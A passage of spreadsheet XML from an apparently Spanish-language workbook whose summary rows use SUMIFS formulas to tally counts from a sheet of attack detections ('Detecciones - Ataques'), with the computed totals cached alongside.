      <c r="GS65" s="480"/>
      <c r="GT65" s="480"/>
      <c r="GU65" s="480"/>
      <c r="GV65" s="480"/>
      <c r="GW65" s="480"/>
      <c r="GX65" s="480"/>
      <c r="GY65" s="480"/>
      <c r="GZ65" s="480"/>
      <c r="HA65" s="480"/>
      <c r="HB65" s="480"/>
      <c r="HC65" s="480"/>
      <c r="HD65" s="480"/>
      <c r="HE65" s="480"/>
      <c r="HF65" s="480"/>
      <c r="HG65" s="480"/>
      <c r="HH65" s="480"/>
      <c r="HI65" s="480"/>
      <c r="HJ65" s="480"/>
      <c r="HK65" s="480"/>
      <c r="HL65" s="480"/>
      <c r="HM65" s="480"/>
      <c r="HN65" s="480"/>
      <c r="HO65" s="480"/>
      <c r="HP65" s="480"/>
    </row>
    <row r="66">
      <c r="J66" s="277"/>
      <c r="K66" s="352" t="s">
        <v>2546</v>
      </c>
      <c r="L66" s="403" t="s">
        <v>2547</v>
      </c>
      <c r="M66" s="403" t="s">
        <v>2548</v>
      </c>
      <c r="N66" s="404" t="s">
        <v>2549</v>
      </c>
      <c r="O66" s="278"/>
      <c r="Q66" s="271"/>
      <c r="R66" s="352" t="s">
        <v>2533</v>
      </c>
      <c r="S66" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,S27) + SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; S27 &amp; "*") </f>
        <v>24</v>
      </c>
      <c r="T66" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,T27) + SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; T27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="U66" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,U27) + SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; U27 &amp; "*") </f>
        <v>109</v>
      </c>
      <c r="V66" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,V27) + SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; V27 &amp; "*") </f>
        <v>17</v>
      </c>
      <c r="W66" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,W27) + SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; W27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="X66" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,X27) + SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; X27 &amp; "*") </f>
        <v>4</v>
      </c>
      <c r="Y66" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Y27) + SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Y27 &amp; "*") </f>
        <v>1</v>
      </c>
      <c r="Z66" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Z27) + SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Z27 &amp; "*") </f>
        <v>571</v>
      </c>
      <c r="AA66" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AA27) + SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AA27 &amp; "*") </f>
        <v>334</v>
      </c>
      <c r="AB66" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AB27) + SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AB27 &amp; "*") </f>
        <v>19</v>
      </c>
      <c r="AC66" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AC27) + SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AC27 &amp; "*") </f>
        <v>7</v>
      </c>
      <c r="AD66" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AD27) + SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AD27 &amp; "*") </f>
        <v>6</v>
      </c>
      <c r="AE66" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AE27) + SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AE27 &amp; "*") </f>
        <v>5</v>
      </c>
      <c r="AF66" s="354">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AF27) + SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AF27 &amp; "*") </f>
        <v>461</v>
      </c>
      <c r="AG66" s="271"/>
      <c r="AH66" s="352" t="s">
        <v>2533</v>
      </c>
      <c r="AI66" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AI27)</f>
        <v>23</v>
      </c>
      <c r="AJ66" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AJ27)</f>
        <v>1</v>
      </c>
      <c r="AK66" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AK27)</f>
        <v>0</v>
      </c>
      <c r="AL66" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AL27)</f>
        <v>0</v>
      </c>
      <c r="AM66" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AM27)</f>
        <v>0</v>
      </c>
      <c r="AN66" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AN27)</f>
        <v>0</v>
      </c>
      <c r="AO66" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AO27)</f>
        <v>0</v>
      </c>
      <c r="AP66" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AP27)</f>
        <v>0</v>
      </c>
      <c r="AQ66" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AQ27)</f>
        <v>106</v>
      </c>
      <c r="AR66" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AR27)</f>
        <v>1</v>
      </c>
      <c r="AS66" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AS27)</f>
        <v>0</v>
      </c>
      <c r="AT66" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AT27)</f>
        <v>0</v>
      </c>
      <c r="AU66" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AU27)</f>
        <v>2</v>
      </c>
      <c r="AV66" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AV27)</f>
        <v>0</v>
      </c>
      <c r="AW66" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AW27)</f>
        <v>0</v>
      </c>
      <c r="AX66" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AX27)</f>
        <v>16</v>
      </c>
      <c r="AY66" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AY27)</f>
        <v>0</v>
      </c>
      <c r="AZ66" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AZ27)</f>
        <v>1</v>
      </c>
      <c r="BA66" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BA27)</f>
        <v>0</v>
      </c>
      <c r="BB66" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BB27)</f>
        <v>0</v>
      </c>
      <c r="BC66" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BC27)</f>
        <v>2</v>
      </c>
      <c r="BD66" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BD27)</f>
        <v>0</v>
      </c>
      <c r="BE66" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BE27)</f>
        <v>1</v>
      </c>
      <c r="BF66" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BF27)</f>
        <v>0</v>
      </c>
      <c r="BG66" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BG27)</f>
        <v>1</v>
      </c>
      <c r="BH66" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BH27)</f>
        <v>0</v>
      </c>
      <c r="BI66" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BI27)</f>
        <v>0</v>
      </c>
      <c r="BJ66" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BJ27)</f>
        <v>0</v>
      </c>
      <c r="BK66" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BK27)</f>
        <v>0</v>
      </c>
      <c r="BL66" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BL27)</f>
        <v>1</v>
      </c>
      <c r="BM66" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BM27)</f>
        <v>568</v>
      </c>
      <c r="BN66" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BN27)</f>
        <v>2</v>
      </c>
      <c r="BO66" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BO27)</f>
        <v>0</v>
      </c>
      <c r="BP66" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BP27)</f>
        <v>0</v>
      </c>
      <c r="BQ66" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BQ27)</f>
        <v>204</v>
      </c>
      <c r="BR66" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BR27)</f>
        <v>0</v>
      </c>
      <c r="BS66" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BS27)</f>
        <v>2</v>
      </c>
      <c r="BT66" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BT27)</f>
        <v>0</v>
      </c>
      <c r="BU66" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BU27)</f>
        <v>0</v>
      </c>
      <c r="BV66" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BV27)</f>
        <v>0</v>
      </c>
      <c r="BW66" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BW27)</f>
        <v>0</v>
      </c>
      <c r="BX66" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BX27)</f>
        <v>0</v>
      </c>
      <c r="BY66" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BY27)</f>
        <v>1</v>
      </c>
      <c r="BZ66" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BZ27)</f>
        <v>123</v>
      </c>
      <c r="CA66" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CA27)</f>
        <v>0</v>
      </c>
      <c r="CB66" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CB27)</f>
        <v>0</v>
      </c>
      <c r="CC66" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CC27)</f>
        <v>0</v>
      </c>
      <c r="CD66" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CD27)</f>
        <v>1</v>
      </c>
      <c r="CE66" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CE27)</f>
        <v>0</v>
      </c>
      <c r="CF66" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CF27)</f>
        <v>1</v>
      </c>
      <c r="CG66" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CG27)</f>
        <v>0</v>
      </c>
      <c r="CH66" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CH27)</f>
        <v>1</v>
      </c>
      <c r="CI66" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CI27)</f>
        <v>1</v>
      </c>
      <c r="CJ66" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CJ27)</f>
        <v>0</v>
      </c>
      <c r="CK66" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CK27)</f>
        <v>1</v>
      </c>
      <c r="CL66" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CL27)</f>
        <v>0</v>
      </c>
      <c r="CM66" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CM27)</f>
        <v>0</v>
      </c>
      <c r="CN66" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CN27)</f>
        <v>0</v>
      </c>
      <c r="CO66" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CO27)</f>
        <v>6</v>
      </c>
      <c r="CP66" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CP27)</f>
        <v>1</v>
      </c>
      <c r="CQ66" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CQ27)</f>
        <v>0</v>
      </c>
      <c r="CR66" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CR27)</f>
        <v>0</v>
      </c>
      <c r="CS66" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CS27)</f>
        <v>0</v>
      </c>
      <c r="CT66" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CT27)</f>
        <v>6</v>
      </c>
      <c r="CU66" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CU27)</f>
        <v>0</v>
      </c>
      <c r="CV66" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CV27)</f>
        <v>0</v>
      </c>
      <c r="CW66" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CW27)</f>
        <v>0</v>
      </c>
      <c r="CX66" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CX27)</f>
        <v>0</v>
      </c>
      <c r="CY66" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CY27)</f>
        <v>0</v>
      </c>
      <c r="CZ66" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CZ27)</f>
        <v>0</v>
      </c>
      <c r="DA66" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DA27)</f>
        <v>0</v>
      </c>
      <c r="DB66" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DB27)</f>
        <v>0</v>
      </c>
      <c r="DC66" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DC27)</f>
        <v>0</v>
      </c>
      <c r="DD66" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DD27)</f>
        <v>0</v>
      </c>
      <c r="DE66" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DE27)</f>
        <v>5</v>
      </c>
      <c r="DF66" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DF27)</f>
        <v>0</v>
      </c>
      <c r="DG66" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DG27)</f>
        <v>0</v>
      </c>
      <c r="DH66" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DH27)</f>
        <v>450</v>
      </c>
      <c r="DI66" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DI27)</f>
        <v>0</v>
      </c>
      <c r="DJ66" s="356">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EL3:$EL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DJ27)</f>
        <v>11</v>
      </c>
      <c r="DK66" s="271"/>
      <c r="DO66" s="279"/>
      <c r="DP66" s="271"/>
      <c r="DQ66" s="271"/>
      <c r="DR66" s="271"/>
      <c r="DS66" s="271"/>
      <c r="DT66" s="271"/>
      <c r="DU66" s="271"/>
      <c r="DV66" s="271"/>
      <c r="DW66" s="271"/>
      <c r="DX66" s="271"/>
      <c r="DY66" s="271"/>
      <c r="DZ66" s="271"/>
      <c r="EA66" s="271"/>
      <c r="EB66" s="271"/>
      <c r="EC66" s="271"/>
      <c r="ED66" s="280"/>
